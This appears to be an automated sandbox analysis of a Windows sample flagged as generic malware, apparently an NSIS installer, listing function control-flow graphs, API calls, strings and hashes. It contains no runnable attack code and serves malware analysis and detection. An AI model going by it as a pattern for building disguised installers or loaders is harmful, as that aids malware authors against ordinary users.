                                                                                                                        control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 210 403fd0-403fdd SetWindowPos 205->210 211 403fe3-403fea 205->211 208 4041cd-4041d2 call 4044ec 206->208 209 40418f-404192 206->209 207->206 221 4041d7-4041f2 208->221 213 404194-40419f call 401389 209->213 214 4041c5-4041c7 209->214 210->211 216 403fec-404006 ShowWindow 211->216 217 40402e-404034 211->217 213->214 238 4041a1-4041c0 SendMessageW 213->238 214->208 220 40446d 214->220 222 404107-404115 call 404507 216->222 223 40400c-40401f GetWindowLongW 216->223 224 404036-404048 DestroyWindow 217->224 225 40404d-404050 217->225 227 40446f-404476 220->227 234 4041f4-4041f6 call 40140b 221->234 235 4041fb-404201 221->235 222->227 223->222 236 404025-404028 ShowWindow 223->236 228 40444a-404450 224->228 230 404052-40405e SetWindowLongW 225->230 231 404063-404069 225->231 228->220 241 404452-404458 228->241 230->227 231->222 237 40406f-40407e GetDlgItem 231->237 234->235 242 404207-404212 235->242 243 40442b-404444 DestroyWindow EndDialog 235->243 236->217 244 404080-404097 SendMessageW IsWindowEnabled 237->244 245 40409d-4040a0 237->245 238->227 241->220 246 40445a-404463 ShowWindow 241->246 242->243 247 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 4040a2-4040a3 245->249 250 4040a5-4040a8 245->250 246->220 274 404267-40426c 247->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 247->275 252 4040d3-4040d8 call 404479 249->252 253 4040b6-4040bb 250->253 254 4040aa-4040b0 250->254 252->222 257 4040f1-404101 SendMessageW 253->257 259 4040bd-4040c3 253->259 254->257 258 4040b2-4040b4 254->258 257->222 258->252 262 4040c5-4040cb call 40140b 259->262 263 4040da-4040e3 call 40140b 259->263 272 4040d1 262->272 263->222 271 4040e5-4040ef 263->271 271->272 272->252 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->221 294 404340-404342 283->294 294->221 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->228 298 404385-4043b2 CreateDialogParamW 296->298 297->220 299 40435a-404360 297->299 298->228 301 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 404366 299->300 300->220 301->220 306 404411-404424 ShowWindow call 4044ec 301->306 308 404429 306->308 308->228
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                                                        • ShowWindow.USER32(?), ref: 00403FFD
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                                                        • DestroyWindow.USER32 ref: 0040403C
                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040413A
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                                                        • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                                                        • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                                                        • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                                                        • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 121052019-0
                                                                                                                        • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                        • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                                                        • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                        • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
                                                                                                                        Function 00403BF3 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 322 403c79-403ca2 call 403ec9 call 405ef8 312->322 317 403c58-403c69 call 4063ef 313->317 318 403c6e-403c74 lstrcatW 313->318 317->318 318->322 327 403d34-403d3c call 405ef8 322->327 328 403ca8-403cad 322->328 333 403d4a-403d6f LoadImageW 327->333 334 403d3e-403d45 call 40655e 327->334 328->327 329 403cb3-403ccd call 4063ef 328->329 335 403cd2-403cdb 329->335 338 403df0-403df8 call 40140b 333->338 339 403d71-403da1 RegisterClassW 333->339 334->333 335->327 336 403cdd-403ce1 335->336 340 403cf3-403cff lstrlenW 336->340 341 403ce3-403cf0 call 405e1d 336->341 352 403e02-403e0d call 403ec9 338->352 353 403dfa-403dfd 338->353 342 403da7-403deb SystemParametersInfoW CreateWindowExW 339->342 343 403ebf 339->343 347 403d01-403d0f lstrcmpiW 340->347 348 403d27-403d2f call 405df0 call 406521 340->348 341->340 342->338 346 403ec1-403ec8 343->346 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 355->348 356->348 356->355 368 403e39-403e4b GetClassInfoW 362->368 369 403e2f-403e34 call 4068a5 362->369 366 403e9c-403e9e 363->366 370 403ea0-403ea6 366->370 371 403eb8-403eba call 40140b 366->371 374 403e63-403e86 DialogBoxParamW call 40140b 368->374 375 403e4d-403e5d GetClassInfoW RegisterClassW 368->375 369->368 370->353 376 403eac-403eb3 call 40140b 370->376 371->343 379 403e8b-403e94 call 403b43 374->379 375->374 376->353 379->346
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                          • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                        • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76343420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00008001), ref: 00403C74
                                                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76343420), ref: 00403CF4
                                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                                                                                        • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\polaritets), ref: 00403D5B
                                                                                                                          • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                        • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                                                        • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\polaritets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                        • API String ID: 1975747703-3367792876
                                                                                                                        • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                                                        • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                                                        • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                                                        • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
                                                                                                                        Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 398->400 401 40312e 398->401 409 40325f-403267 call 40301e 400->409 410 40313f-403146 400->410 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 431 403224-40322a 405->431 406->403 430 403269-40327a 406->430 409->403 414 4031c2-4031c6 410->414 415 403148-40315c call 405fcc 410->415 419 4031d0-4031d6 414->419 420 4031c8-4031cf call 40301e 414->420 415->419 434 40315e-403165 415->434 425 4031e5-4031ed 419->425 426 4031d8-4031e2 call 406a02 419->426 420->419 425->398 429 4031f3 425->429 426->425 429->396 435 403282-403287 430->435 436 40327c 430->436 431->403 431->406 434->419 438 403167-40316e 434->438 440 403288-40328e 435->440 436->435 438->419 439 403170-403177 438->439 439->419 441 403179-403180 439->441 440->440 442 403290-4032ab SetFilePointer call 405fcc 440->442 441->419 443 403182-4031a2 441->443 446 4032b0 442->446 443->403 445 4031a8-4031ac 443->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->419 449 4031be-4031c0 447->449 448->429 448->447 449->419
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,00000400), ref: 004030AF
                                                                                                                          • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                          • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 004030FB
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 004030D2
                                                                                                                        • soft, xrefs: 00403170
                                                                                                                        • Inst, xrefs: 00403167
                                                                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                                                                                                        • Null, xrefs: 00403179
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00403088
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                        • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                        • API String ID: 2803837635-238327923
                                                                                                                        • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                        • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                                                        • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                        • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                                                                                                                        Function 0040655E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 450 40655e-406567 451 406569-406578 450->451 452 40657a-406594 450->452 451->452 453 4067a4-4067aa 452->453 454 40659a-4065a6 452->454 455 4067b0-4067bd 453->455 456 4065b8-4065c5 453->456 454->453 457 4065ac-4065b3 454->457 459 4067c9-4067cc 455->459 460 4067bf-4067c4 call 406521 455->460 456->455 458 4065cb-4065d4 456->458 457->453 461 406791 458->461 462 4065da-40661d 458->462 460->459 464 406793-40679d 461->464 465 40679f-4067a2 461->465 466 406623-40662f 462->466 467 406735-406739 462->467 464->453 465->453 468 406631 466->468 469 406639-40663b 466->469 470 40673b-406742 467->470 471 40676d-406771 467->471 468->469 474 406675-406678 469->474 475 40663d-40665b call 4063ef 469->475 472 406752-40675e call 406521 470->472 473 406744-406750 call 406468 470->473 476 406781-40678f lstrlenW 471->476 477 406773-40677c call 40655e 471->477 486 406763-406769 472->486 473->486 481 40667a-406686 GetSystemDirectoryW 474->481 482 40668b-40668e 474->482 485 406660-406663 475->485 476->453 477->476 487 406718-40671b 481->487 488 4066a0-4066a4 482->488 489 406690-40669c GetWindowsDirectoryW 482->489 491 406669-406670 call 40655e 485->491 492 40671d-406720 485->492 486->476 493 40676b 486->493 487->492 494 40672d-406733 call 4067cf 487->494 488->487 490 4066a6-4066c4 488->490 489->488 496 4066c6-4066cc 490->496 497 4066d8-4066f0 call 406915 490->497 491->487 492->494 499 406722-406728 lstrcatW 492->499 493->494 494->476 503 4066d4-4066d6 496->503 507 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 497->507 508 406707-406710 497->508 499->494 503->497 505 406712-406716 503->505 505->487 507->505 507->508 508->490 508->505
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 4024019347-1547937423
                                                                                                                        • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                        • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                                                        • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                        • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
                                                                                                                        Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 639 4055a6-4055bb 640 4055c1-4055d2 639->640 641 405672-405676 639->641 642 4055d4-4055d8 call 40655e 640->642 643 4055dd-4055e9 lstrlenW 640->643 642->643 645 405606-40560a 643->645 646 4055eb-4055fb lstrlenW 643->646 648 405619-40561d 645->648 649 40560c-405613 SetWindowTextW 645->649 646->641 647 4055fd-405601 lstrcatW 646->647 647->645 650 405663-405665 648->650 651 40561f-405661 SendMessageW * 3 648->651 649->648 650->641 652 405667-40566a 650->652 651->650 652->641
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                        • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll
                                                                                                                        • API String ID: 2531174081-1132853986
                                                                                                                        • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                        • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                                                        • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                        • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68
                                                                                                                        Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 653 4026f1-40270a call 402d89 656 402710-402717 653->656 657 402c2f-402c32 653->657 659 402719 656->659 660 40271c-40271f 656->660 658 402c38-402c3e 657->658 659->660 662 402883-40288b 660->662 663 402725-402734 call 406481 660->663 662->657 663->662 666 40273a 663->666 667 402740-402744 666->667 668 4027d9-4027dc 667->668 669 40274a-402765 ReadFile 667->669 671 4027f4-402804 call 406094 668->671 672 4027de-4027e1 668->672 669->662 670 40276b-402770 669->670 670->662 673 402776-402784 670->673 671->662 680 402806 671->680 672->671 674 4027e3-4027ee call 4060f2 672->674 676 40278a-40279c MultiByteToWideChar 673->676 677 40283f-40284b call 406468 673->677 674->662 674->671 676->680 681 40279e-4027a1 676->681 677->658 684 402809-40280c 680->684 685 4027a3-4027ae 681->685 684->677 687 40280e-402813 684->687 685->684 688 4027b0-4027d5 SetFilePointer MultiByteToWideChar 685->688 689 402850-402854 687->689 690 402815-40281a 687->690 688->685 691 4027d7 688->691 693 402871-40287d SetFilePointer 689->693 694 402856-40285a 689->694 690->689 692 40281c-40282f 690->692 691->680 692->662 695 402831-402837 692->695 693->662 696 402862-40286f 694->696 697 40285c-402860 694->697 695->667 698 40283d 695->698 696->662 697->693 697->696 698->662
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
